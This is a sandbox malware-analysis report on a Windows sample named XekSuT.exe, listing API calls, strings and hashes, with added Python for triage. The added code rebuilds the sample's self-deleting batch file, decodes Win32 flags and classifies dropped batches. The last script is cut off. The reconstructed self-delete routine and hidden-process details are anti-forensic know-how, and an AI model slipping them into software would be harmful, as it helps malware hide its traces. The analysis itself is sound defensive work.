                                                                                                                  • Part of subcall function 003C1973: GetFileSize.KERNEL32(?,00000000), ref: 003C1A2C
                                                                                                                  • Part of subcall function 003C1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 003C1A46
                                                                                                                  • Part of subcall function 003C1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 003C1A65
                                                                                                                • DeleteFileA.KERNEL32(?,?,003C4E54,003C4E58), ref: 003C281A
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,003C4E54,003C4E58), ref: 003C2832
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                                                                                                • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                                                                                                • API String ID: 692489704-3961832207
                                                                                                                • Opcode ID: 96ee63655fa08b98fc76511df5d86997b25e1d0743cd111fcc55687e06a44327
                                                                                                                • Instruction ID: ff683cb7a6e5df261a5add46a363deb1c0fc3db772b226cda8816c246b3a29fd
                                                                                                                • Opcode Fuzzy Hash: 96ee63655fa08b98fc76511df5d86997b25e1d0743cd111fcc55687e06a44327
                                                                                                                • Instruction Fuzzy Hash: FF2130B694031C7BEB12E7A49C99FDB776CEB04744F0045A9F645E2042E670AF448BA0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 003C185B: GetSystemTimeAsFileTime.KERNEL32(003C1F92,00000000,?,00000000,?,?,?,003C1F92,?,00000000,00000002), ref: 003C1867
                                                                                                                  • Part of subcall function 003C185B: srand.MSVCRT ref: 003C1878
                                                                                                                  • Part of subcall function 003C185B: rand.MSVCRT ref: 003C1880
                                                                                                                  • Part of subcall function 003C185B: srand.MSVCRT ref: 003C1890
                                                                                                                  • Part of subcall function 003C185B: rand.MSVCRT ref: 003C1894
                                                                                                                • wsprintfA.USER32 ref: 003C15AA
                                                                                                                • wsprintfA.USER32 ref: 003C15C6
                                                                                                                • lstrlen.KERNEL32(?), ref: 003C15D2
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 003C15EE
                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 003C1609
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 003C1612
                                                                                                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 003C162D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                                                                                                • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XekSuT.exe$open
                                                                                                                • API String ID: 617340118-1701430585
                                                                                                                • Opcode ID: efa75f7d406b45bc8b5fa1f6f8a42728b547d846a9a2ddba4c84192703946f5b
                                                                                                                • Instruction ID: 126e7da1eaa3a81eaf0d6b134ad34e460b014ba53a197c7079cd9aa960f85c7c
                                                                                                                • Opcode Fuzzy Hash: efa75f7d406b45bc8b5fa1f6f8a42728b547d846a9a2ddba4c84192703946f5b
                                                                                                                • Instruction Fuzzy Hash: EE1173B6A011387FD722A7A59C89EEB7B7CEF59750F044055F94AE3041DA70AF848BB0
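Added example, not part of the Joe Sandbox report and not code from the sample: the two wsprintfA calls above, the CreateFileA/WriteFile/CloseHandle sequence and ShellExecuteA with the "open" verb are the classic self-deletion-by-batch-file routine that the report's "Self deletion via cmd or bat file" signature refers to. The Python below rebuilds the dropped .bat from the format strings in the String ID and then runs a small classifier that an analyst can point at any dropped batch file to confirm the retry-delete loop and the self-erase step. Assumptions: the line breaks between the batch fragments and the order in which the %s slots are filled (target path twice, then the batch's own path) are not visible in the report and are inferred from the usual form of this loop; the Temp path and the XekSuT.exe name are the ones the report shows; the 0x1A2B3C4D tag is a constructed stand-in for the rand()-derived value.

```python
import re

# Format strings recovered from the report's String ID for the function at
# 003C15AA-003C162D (the two wsprintfA calls). The report runs the batch
# fragments together; the line breaks and the %s slot order below are
# assumptions matching the usual shape of this loop, not report facts.
BAT_NAME_FMT = "%s%.8x.bat"
BAT_BODY_FMT = ':DELFILE\r\ndel "%s"\r\nif exist "%s" goto :DELFILE\r\ndel "%s"\r\n'

# Dropped helper name: Temp directory plus exactly eight hex digits from %.8x.
DROPPED_BAT_NAME = re.compile(r"^[0-9a-f]{8}\.bat$", re.IGNORECASE)

_LABEL = re.compile(r"^:(\w+)\s*$")
_DEL = re.compile(r'^del\s+(?:/\w+\s+)*"?([^"]+?)"?\s*$', re.IGNORECASE)
_LOOP = re.compile(r'^if\s+exist\s+"?([^"]+?)"?\s+goto\s+:?(\w+)\s*$', re.IGNORECASE)


def reconstruct_batch(temp_dir, target_exe, tag):
    """Rebuild the .bat path and body as the two wsprintfA calls would produce them.

    tag is the 32-bit value printed by %.8x (derived from rand() in the sample).
    Assumed slot order: target path twice, then the batch's own path."""
    bat_path = BAT_NAME_FMT % (temp_dir, tag)
    body = BAT_BODY_FMT % (target_exe, target_exe, bat_path)
    return bat_path, body


def analyze_self_delete_batch(body, bat_path=None):
    """Classify a dropped batch file.

    Returns the files deleted inside a label / if exist / goto retry loop
    (the loop spins until the still-running executable is unlocked) and
    whether the script erases itself afterwards (by its own path or %0)."""
    labels, dels, loops = {}, [], []
    for n, raw in enumerate(body.splitlines()):
        line = raw.strip()
        m = _LABEL.match(line)
        if m:
            labels[m.group(1).lower()] = n
            continue
        m = _DEL.match(line)
        if m:
            dels.append((n, m.group(1)))
            continue
        m = _LOOP.match(line)
        if m:
            loops.append((n, m.group(1), m.group(2).lower()))

    retry_targets = set()
    for n, path, label in loops:
        # A backwards goto to a label placed before a del of the same path is the retry loop.
        if label in labels and labels[label] < n and any(
            d < n and p.lower() == path.lower() for d, p in dels
        ):
            retry_targets.add(path)

    erases_self = any(
        p == "%0" or (bat_path is not None and p.lower() == bat_path.lower())
        for _, p in dels
    )
    return {"retry_delete": sorted(retry_targets), "erases_self": erases_self}


if __name__ == "__main__":
    temp = "C:\\Users\\user\\AppData\\Local\\Temp\\"
    path, text = reconstruct_batch(temp, temp + "XekSuT.exe", 0x1A2B3C4D)
    print(path)
    print(text)
    print(analyze_self_delete_batch(text, path))
```

The classifier is deliberately loose about `del` switches and quoting so it also flags hand-written variants; the name check is strict because the `%.8x` format fixes the dropped file name at eight hex digits plus `.bat`, which is a cheap filter over a sandbox's dropped-files list.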
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,003C1400), ref: 003C1226
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 003C122D
                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,003C1400), ref: 003C123F
                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,003C1400), ref: 003C1250
                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\XekSuT.exe,?,?,?,?,003C1400), ref: 003C129E
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\XekSuT.exe,?,?,?,?,003C1400), ref: 003C12B0
                                                                                                                • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\XekSuT.exe,?,?,?,?,003C1400), ref: 003C12F5
                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,003C1400), ref: 003C130A
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\XekSuT.exe, xrefs: 003C1262
                                                                                                                • ZwQuerySystemInformation, xrefs: 003C1212
                                                                                                                • ntdll.dll, xrefs: 003C1219
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\XekSuT.exe$ZwQuerySystemInformation$ntdll.dll
                                                                                                                • API String ID: 1500695312-757463314
                                                                                                                • Opcode ID: d8fb6c8b70f35d431b1c9474ab772f7a5dfcb5451ad6c046008aa2a26f90263e
                                                                                                                • Instruction ID: 58c02a85f0d552b60bccc8a5db811d63a515a73a9ebd8203e787f6729ce1cf43
                                                                                                                • Opcode Fuzzy Hash: d8fb6c8b70f35d431b1c9474ab772f7a5dfcb5451ad6c046008aa2a26f90263e
                                                                                                                • Instruction Fuzzy Hash: 2721F576645321ABD7229B65CC08FABBAACFB87B00F114D1CF946D6241C770EE40D7A5
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 003C18B1
                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,74DF0F00,75BF8400), ref: 003C18D3
                                                                                                                • CloseHandle.KERNEL32(I%<), ref: 003C18E9
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003C18F0
                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 003C1901
                                                                                                                • CloseHandle.KERNEL32(?), ref: 003C190A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                                                                                                • String ID: I%<
                                                                                                                • API String ID: 876959470-1201062717
                                                                                                                • Opcode ID: 03970b9fadb1d870836068feff2f221e8487e2fc6b49c773cc48e8f5e047e0d0
                                                                                                                • Instruction ID: 472adfaa1cc35845101af9b5d822df5c61fe8d4246ab7750e4c06ffc54c9d452
                                                                                                                • Opcode Fuzzy Hash: 03970b9fadb1d870836068feff2f221e8487e2fc6b49c773cc48e8f5e047e0d0
                                                                                                                • Instruction Fuzzy Hash: 9E017172901128BBCB226B95DC48DDF7F3DFF85724F108025F916E51A0D6315A18CBA0
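Added example, not from the report and not code from the sample: the argument lists in the entries above are raw hex, so the details that matter for triage (the access OpenProcess asked for, what the 0x50000-byte VirtualAlloc mapped after the ZwQuerySystemInformation lookup, whether CreateProcessA hid its window) are easy to misread. This Python decoder parses the report's own "API.DLL(args), ref: addr" lines and annotates the flag arguments with their documented Win32 names. The sample lines are copied from this page; the constant tables cover only the APIs and flags that appear here, and any argument the report shows as "?" is reported as not recovered.

```python
import re

# Constructed input: API lines copied verbatim from this report's function listing.
SAMPLE_LINES = [
    "• CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 003C15EE",
    "• OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,003C1400), ref: 003C1250",
    "• VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,"
    "C:\\Users\\user\\AppData\\Local\\Temp\\XekSuT.exe,?,?,?,?,003C1400), ref: 003C12B0",
    "• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,003C1400), ref: 003C130A",
    "• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,"
    "00000000,?,?,000007D0,74DF0F00,75BF8400), ref: 003C18D3",
]

# One report line: optional "Part of subcall function X:" prefix, API.DLL(args), ref: address.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w@?$]+)\.(?P<dll>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Documented Win32 values (winnt.h / winbase.h / memoryapi.h).
BITS = {
    "access": {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
               0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"},
    "procaccess": {0x0001: "PROCESS_TERMINATE", 0x0008: "PROCESS_VM_OPERATION",
                   0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
                   0x0400: "PROCESS_QUERY_INFORMATION",
                   0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"},
    "alloc": {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"},
    "free": {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"},
    "createflags": {0x00000004: "CREATE_SUSPENDED", 0x00000008: "DETACHED_PROCESS",
                    0x00000010: "CREATE_NEW_CONSOLE",
                    0x04000000: "CREATE_DEFAULT_ERROR_MODE", 0x08000000: "CREATE_NO_WINDOW"},
}
ENUMS = {
    "disposition": {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                    4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"},
    "protect": {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"},
}

# (argument index, parameter name, decoder kind, table key) for the APIs seen on this page.
ARG_SPEC = {
    "CreateFileA": [(1, "dwDesiredAccess", "bits", "access"),
                    (4, "dwCreationDisposition", "enum", "disposition")],
    "OpenProcess": [(0, "dwDesiredAccess", "bits", "procaccess")],
    "VirtualAlloc": [(1, "dwSize", "size", None), (2, "flAllocationType", "bits", "alloc"),
                     (3, "flProtect", "enum", "protect")],
    "VirtualFree": [(2, "dwFreeType", "bits", "free")],
    "CreateProcessA": [(5, "dwCreationFlags", "bits", "createflags")],
}


def _flags(value, table):
    """Name every known bit in value; leftover bits are shown as hex so nothing is hidden."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append("0x%X" % rest)
    return "|".join(names) if names else "0"


def decode_api_line(line):
    """Parse one report line; returns None if the line is not an API entry."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    notes = []
    for idx, name, kind, key in ARG_SPEC.get(m["api"], []):
        if idx >= len(args) or not re.fullmatch(r"[0-9A-Fa-f]{1,8}", args[idx]):
            notes.append("%s=? (not recovered)" % name)
            continue
        v = int(args[idx], 16)
        if kind == "bits":
            notes.append("%s=%s" % (name, _flags(v, BITS[key])))
        elif kind == "enum":
            notes.append("%s=%s" % (name, ENUMS[key].get(v, "0x%X" % v)))
        else:
            notes.append("%s=0x%X (%d bytes)" % (name, v, v))
    return {"api": m["api"], "dll": m["dll"], "ref": m["ref"], "args": args, "notes": notes}


def decode_report(lines):
    return [row for row in (decode_api_line(l) for l in lines) if row]


if __name__ == "__main__":
    for row in decode_report(SAMPLE_LINES):
        print(row["ref"], row["api"], "; ".join(row["notes"]))
```

Run against the lines above it shows CreateFileA opening the .bat with GENERIC_READ|GENERIC_WRITE and CREATE_ALWAYS, OpenProcess asking only for PROCESS_QUERY_INFORMATION, a committed read/write 0x50000-byte buffer released with MEM_RELEASE (the pattern that goes with sizing a ZwQuerySystemInformation result buffer), and CreateProcessA started with CREATE_NO_WINDOW so the child never shows a console. The leftover-bits fallback in `_flags` matters when applying this to other reports: an unknown bit shows up as hex instead of being silently dropped.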
                                                                                                                APIs
                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,74DEE800,?,?,003C29DB,?,00000001), ref: 003C26A7
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,74DEE800,?,?,003C29DB,?,00000001), ref: 003C26B5
                                                                                                                • lstrlen.KERNEL32(?), ref: 003C26C4
                                                                                                                • ??2@YAPAXI@Z.MSVCRT(-00000005), ref: 003C26CE
                                                                                                                • lstrcpy.KERNEL32(00000004,?), ref: 003C26E3
                                                                                                                • lstrcpy.KERNEL32(?,00000004), ref: 003C271F
                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 003C272D
                                                                                                                • SetEvent.KERNEL32 ref: 003C273C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 41106472-0
                                                                                                                • Opcode ID: 62f7e46abc5de31f85aecf3193b9f2baed82a34885ab6d71ce74f6eab8f47a73
                                                                                                                • Instruction ID: a70f8c72b86d98b068872a0e86086a56fa55e5a13e906fc515faca371dbd1b71
                                                                                                                • Opcode Fuzzy Hash: 62f7e46abc5de31f85aecf3193b9f2baed82a34885ab6d71ce74f6eab8f47a73
                                                                                                                • Instruction Fuzzy Hash: AB118F76500210EFCB23AF69EC88D5B7BADFB84721F168029F85AD7121D770AD85DB60
                                                                                                                APIs
                                                                                                                • srand.MSVCRT ref: 003C1BCD
                                                                                                                • rand.MSVCRT ref: 003C1BD8
                                                                                                                • memset.MSVCRT ref: 003C1C43
                                                                                                                • memcpy.MSVCRT(?,CjQNZOGccPzoeIlyMExymiYOJmbwhkgtDRoVwpTqUYgqXzufLvTCFalyuuPgZHkJPCsGsoKONhBIMkQrnVrtFAiAXxhsKjwaHbWEnXHNDLdbYefcZVWjqdULRIpndSvSFMrSUxBRAEfJzKpGlmeWQDtivBaT,00000006,?,00000000,00000040,?,00000000,00000000,?,00000000,00000002), ref: 003C1C4F
                                                                                                                • lstrcat.KERNEL32(?,.exe), ref: 003C1C5D
                                                                                                                Strings
                                                                                                                • CjQNZOGccPzoeIlyMExymiYOJmbwhkgtDRoVwpTqUYgqXzufLvTCFalyuuPgZHkJPCsGsoKONhBIMkQrnVrtFAiAXxhsKjwaHbWEnXHNDLdbYefcZVWjqdULRIpndSvSFMrSUxBRAEfJzKpGlmeWQDtivBaT, xrefs: 003C1B8A, 003C1B9C, 003C1C15, 003C1C49
                                                                                                                • .exe, xrefs: 003C1C57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcatmemcpymemsetrandsrand
                                                                                                                • String ID: .exe$CjQNZOGccPzoeIlyMExymiYOJmbwhkgtDRoVwpTqUYgqXzufLvTCFalyuuPgZHkJPCsGsoKONhBIMkQrnVrtFAiAXxhsKjwaHbWEnXHNDLdbYefcZVWjqdULRIpndSvSFMrSUxBRAEfJzKpGlmeWQDtivBaT
                                                                                                                • API String ID: 122620767-3124869439
                                                                                                                • Opcode ID: 898de830939479136b6ff5ddfe991487fc5a6bcbabafa1744110884a04304a96
                                                                                                                • Instruction ID: ce2abdf9f6322e182936facb8bd6d68cfd64f41cf63e7c95e587c2a81b2a2690
                                                                                                                • Opcode Fuzzy Hash: 898de830939479136b6ff5ddfe991487fc5a6bcbabafa1744110884a04304a96
                                                                                                                • Instruction Fuzzy Hash: 53216B22E442A06ED31723396C64FAA3F489FA7721F16809DF486CB193D2641DC39360
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 003C1334
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 003C133B
                                                                                                                • memset.MSVCRT ref: 003C1359
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcmemset
                                                                                                                • String ID: NtSystemDebugControl$ntdll.dll
                                                                                                                • API String ID: 3137504439-2438149413
                                                                                                                • Opcode ID: a2d30baac50b7aef09bad71d35b38480cc5c2c5efd3fc645ad26383436725a82
                                                                                                                • Instruction ID: e9a430319dc01e33c0ced7f42b62280419003b614d394cca602edbe8b0af0e8e
                                                                                                                • Opcode Fuzzy Hash: a2d30baac50b7aef09bad71d35b38480cc5c2c5efd3fc645ad26383436725a82
                                                                                                                • Instruction Fuzzy Hash: 94016D76600359AFDB12DF94AC85EAFBBBCFB42318F00812EF901E2141E3709A15DB51
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strrchr$lstrcmpilstrcpylstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3636361484-0
                                                                                                                • Opcode ID: 86c1a77109f803ac3a479900b1dddcedca3ce2413718efa82a3b3c70762749b5
                                                                                                                • Instruction ID: de7b28ae56ce5969f22b8afd6e6ae852713075d1bf9cb86677a81f528ea2a37d
                                                                                                                • Opcode Fuzzy Hash: 86c1a77109f803ac3a479900b1dddcedca3ce2413718efa82a3b3c70762749b5
                                                                                                                • Instruction Fuzzy Hash: DF01F9B39142296FEB225770EC48FD677DCEB05310F15406AEA46E3091EA74EE849BA0
                                                                                                                APIs
                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(003C1F92,00000000,?,00000000,?,?,?,003C1F92,?,00000000,00000002), ref: 003C1867
                                                                                                                • srand.MSVCRT ref: 003C1878
                                                                                                                • rand.MSVCRT ref: 003C1880
                                                                                                                • srand.MSVCRT ref: 003C1890
                                                                                                                • rand.MSVCRT ref: 003C1894
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Timerandsrand$FileSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 4106363736-0
                                                                                                                • Opcode ID: 177e99b80ef17b7c0d4c23b82040904654e19dd29738546c52272adae4536685
                                                                                                                • Instruction ID: 4bbab118979f20559a1e6486db168170ef40e66eb28f256cdef3900b73ded315
                                                                                                                • Opcode Fuzzy Hash: 177e99b80ef17b7c0d4c23b82040904654e19dd29738546c52272adae4536685
                                                                                                                • Instruction Fuzzy Hash: 59E0D877A00228BBD700A7F9EC46C9EBBACEE84261F100527F601D3250E570FD448BB4
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 003C603C
                                                                                                                • GetProcAddress.KERNEL32(00000000,003C6064), ref: 003C604F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: kernel32.dll
                                                                                                                • API String ID: 1646373207-1793498882
                                                                                                                • Opcode ID: a9c0c2112eefff716ce5f7b356284bbb0378545e8d6440b90cc4173e26c7f084
                                                                                                                • Instruction ID: 3f6159de7ac2ff1d7394e5d593a61a1a05045a11dd2d8c1083ef74f396eefcbc
                                                                                                                • Opcode Fuzzy Hash: a9c0c2112eefff716ce5f7b356284bbb0378545e8d6440b90cc4173e26c7f084
                                                                                                                • Instruction Fuzzy Hash: DEF0CDB11442998BEF718EA4CC45FDE3BE4EB05700F50042EEA09CB282CB348A058B24
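The GetModuleHandleA/GetProcAddress pair listed above, and the run of GetProcAddress calls against kernel32.dll listed under Control-flow Graph further down, are the sample resolving its Win32 imports at runtime rather than through the PE import directory, so the names an analyst wants (CreateMutexA, ExpandEnvironmentStringsA, TerminateThread, ...) only appear in the sandbox API trace. The script below is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses lines in the report's "APIs" listing format (a constructed subset of this page's lines is embedded) and rebuilds the runtime-resolved import list per module, keeping separately any GetProcAddress target the sandbox could not symbolize. The bullet character, the `ref:` suffix and the LoadLibrary*/GetModuleHandle* set it keys on are assumptions about the listing format taken from the lines on this page.

```python
import re
from collections import OrderedDict

# Constructed sample in the shape of the report's "APIs" listing (a subset of
# the lines shown on this page, not the complete listing).
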